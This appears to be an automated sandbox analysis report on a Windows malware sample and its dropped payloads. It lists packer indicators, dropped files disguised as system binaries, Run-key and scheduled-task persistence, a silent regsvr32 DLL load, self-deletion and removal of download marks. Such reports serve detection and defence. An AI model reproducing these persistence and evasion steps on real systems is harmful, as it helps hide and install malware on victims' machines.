Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb p source: AppLaunch.exe, 00000009.00000002.2398878448.000000000BA50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 4A1B.exe, 0000000A.00000002.2383523075.00000000008DE000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: O/C:\kopoyezo_vebasezase\vonore\debih.pdb source: file.exe, 00000000.00000000.1700208337.0000000000401000.00000020.00000001.01000000.00000003.sdmp, vahvrsu, 00000005.00000000.1994291195.0000000000401000.00000020.00000001.01000000.00000005.sdmp, vahvrsu, 00000014.00000000.2336436403.0000000000401000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: INTERN~1GPUCache.pdb source: 4A1B.exe, 0000000A.00000002.2389137053.0000000001525000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\kasixuxopoxog\zib\mad.pdb source: 8042.exe, 00000011.00000000.2289948160.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: LC:\kasixuxopoxog\zib\mad.pdb source: 8042.exe, 00000011.00000000.2289948160.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\kopoyezo_vebasezase\vonore\debih.pdb source: file.exe, 00000000.00000000.1700208337.0000000000401000.00000020.00000001.01000000.00000003.sdmp, vahvrsu, 00000005.00000000.1994291195.0000000000401000.00000020.00000001.01000000.00000005.sdmp, vahvrsu, 00000014.00000000.2336436403.0000000000401000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vahvrsu	Unpacked PE file: 5.2.vahvrsu.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Unpacked PE file: 10.2.4A1B.exe.890000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Unpacked PE file: 17.2.8042.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014A1 push es; iretd	0_2_004014A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004022A8 pushfd ; ret	0_2_004022C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02AE230F pushfd ; ret	0_2_02AE232E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02AE1506 push es; iretd	0_2_02AE150A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C699D2 push 8A1E29FAh; iretd	0_2_02C699D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C69FF7 pushfd ; ret	0_2_02C6A0D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C700FF push cs; iretd	0_2_02C70101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C619FA push edx; iretd	0_2_02C619FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C694BC push es; iretd	0_2_02C694DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02C6C85E push ss; iretd	0_2_02C6C864
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_004014A1 push es; iretd	5_2_004014A3
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_004022A8 pushfd ; ret	5_2_004022C7
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02B31506 push es; iretd	5_2_02B3150A
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02B3230F pushfd ; ret	5_2_02B3232E
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02BA8FFF pushfd ; ret	5_2_02BA90DE
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02BA89DA push 8A1E29FAh; iretd	5_2_02BA89DF
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02BA84C4 push es; iretd	5_2_02BA84E4
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02BAF107 push cs; iretd	5_2_02BAF109
Source: C:\Users\user\AppData\Roaming\vahvrsu	Code function: 5_2_02BAB866 push ss; iretd	5_2_02BAB86C
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0016C88F push cs; iretd	7_2_0016C89B
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0014512B push ecx; ret	7_2_0014513E
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0016D21E push ds; iretd	7_2_0016D284
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0016DAFD push ebp; ret	7_2_0016DB04
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0016CD26 push edx; iretd	7_2_0016CD27
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0016DF0C push esp; ret	7_2_0016DF6C
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Code function: 7_2_0016DF66 push esp; ret	7_2_0016DF6C
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_02A3F4BD push cs; ret	11_2_02A3F4BE
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_02A077ED push ebp; retf	11_2_02A077EE
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_02A3F7F8 push edx; retf	11_2_02A3F7F9
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_0294D2EF push ebx; iretd	11_2_0294D2F7
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Code function: 11_2_029A170A pushad ; ret	11_2_029A170C

Source: 4A1B.exe.1.dr

Static PE information: 0x9C3436CD [Thu Jan 16 19:13:17 2053 UTC]

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\57C9.dll

Source: 4A1B.exe.1.dr	Static PE information: section name:
Source: 4A1B.exe.1.dr	Static PE information: section name:
Source: 4A1B.exe.1.dr	Static PE information: section name:
Source: 4A1B.exe.1.dr	Static PE information: section name: .themida
Source: 4A1B.exe.1.dr	Static PE information: section name: .boot
Source: 57C9.dll.1.dr	Static PE information: section name: CRT
Source: CL_Debug_Log.txt.6.dr	Static PE information: section name: .sxdata

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: initial sample	Static PE information: section name: .text entropy: 6.844566928356145
Source: initial sample	Static PE information: section name: .text entropy: 6.820182848974589
Source: initial sample	Static PE information: section name: entropy: 7.997134942202905
Source: initial sample	Static PE information: section name: .text entropy: 7.973061183401066
Source: initial sample	Static PE information: section name: .text entropy: 6.820182848974589
Source: initial sample	Static PE information: section name: .text entropy: 6.844566928356145
Source: initial sample	Static PE information: section name: .text entropy: 7.973061183401066

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\50E3.exe

File created: C:\ProgramData\Drivers\csrss.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\50E3.exe

File created: C:\ProgramData\Drivers\csrss.exe

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\tdhvrsu	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vahvrsu	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	File created: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\tdhvrsu	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\38B4.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\57C9.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4A1B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	File created: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt	File created: C:\Users\user\AppData\Local\Temp\64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt	File created: C:\Users\user\AppData\Local\Temp\32.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8042.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\41CD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\vahvrsu	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\50E3.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"

Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CSRSS

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\vahvrsu:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\tdhvrsu:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4A1B.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
